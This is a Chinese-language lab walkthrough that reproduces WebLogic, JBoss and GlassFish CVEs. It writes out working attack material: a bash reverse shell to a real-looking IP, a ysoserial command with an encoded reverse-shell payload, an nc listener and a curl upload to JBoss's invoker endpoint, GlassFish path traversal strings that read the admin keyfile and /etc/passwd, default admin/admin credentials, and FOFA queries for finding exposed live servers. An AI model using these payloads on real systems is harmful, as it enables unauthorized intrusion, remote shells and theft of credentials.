中间件安全-CVE漏洞复现-Weblogic+JBoss+GlassFish

中间件安全-CVE漏洞复现-Weblogic+JBoss+GlassFish

原创 兰陵猪猪哼 小黑子安全 2024-04-08 07:54

服务攻防测试流程:

使用
vulfocus
靶场:

案例演示:
中间件-Weblogic-工具
梭哈

探针默认端口:7001,Weblogic是Oracle公司推出的J2EE应用服务器

使用
vulfocus
靶场复现漏洞

漏洞:weblogic-cve_2020_14883

启动环境

工具:
https://github.com/ghealer/GUI_Tools

使用工具检测漏洞,在工具输入漏洞网址

执行命令

使用
vulhub
靶场:

案例演示:中间件-JBoos-工具脚本梭哈

Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个,Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。

漏洞:
jboss
web
控制台

弱口令

fofa
语法:
“JBoss”
&& title==”Welcome to JBoss™”

使用
fofa
搜索到资产,打开网站,进入
jboss web
控制台

需要登录,使用弱口令:
admin/admin
成功登录

漏洞:
JBoss
中间件

CVE-2017-12149

使用
vulhub
靶场开启环境

我们使用
bash
来反弹
shell
,但由于
Runtime.getRuntime().exec()
中不能使用管道符等
bash
需要的方法,我们需要用进行一次编码。

命令:
bash -i

& /dev/tcp/43.134.241.1
93
/5566
0>&1

使用工具:
https://github.com/frohoff/ysoserial

来生成反弹
shell

poc
文件

使用工具执行命令:
java -jar
ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 “bash -c
{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80My4xMzQuMjQxLjEzOS81NTY2IDA+JjE=}|{base64,-d}|{bash,-i}”

poc.ser

在工具目录下生成一个
poc.esr
文件,这个文件就是
java
编写的执行反弹
shell
命令的文件

服务器开启监听端口
5566

命令:
nc -lvvp 5566

然后在当前目录执行命令将
poc
文件上传到目标目录

命令:curl
http://
192.168.163.128
:
8080
/invoker/readonly
 –data-binary @poc.ser

服务器成功获取
shell

案例演示:GlassFish 任意文件读取漏洞(
CVE-2017-1000028

探针默认端口:4848,GlassFish 是一款强健的商业兼容应用服务器

影响版本

Oracle
GlassFish Server Open Source Edition 4.1
版本

fofa
搜索语法:
“glassfish”
&& port=”4848″

复现漏洞路径:

读密码:/theme/META-INF/%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./%c0.%c0./domains/domain1/config/admin-keyfile

读windows文件:/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

读linux文件:/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

开启漏洞环境

读取密码文件

读取
linux
敏感文件

网络安全技术交流群:wx加我好友,备注“进群”

QQ群:708769345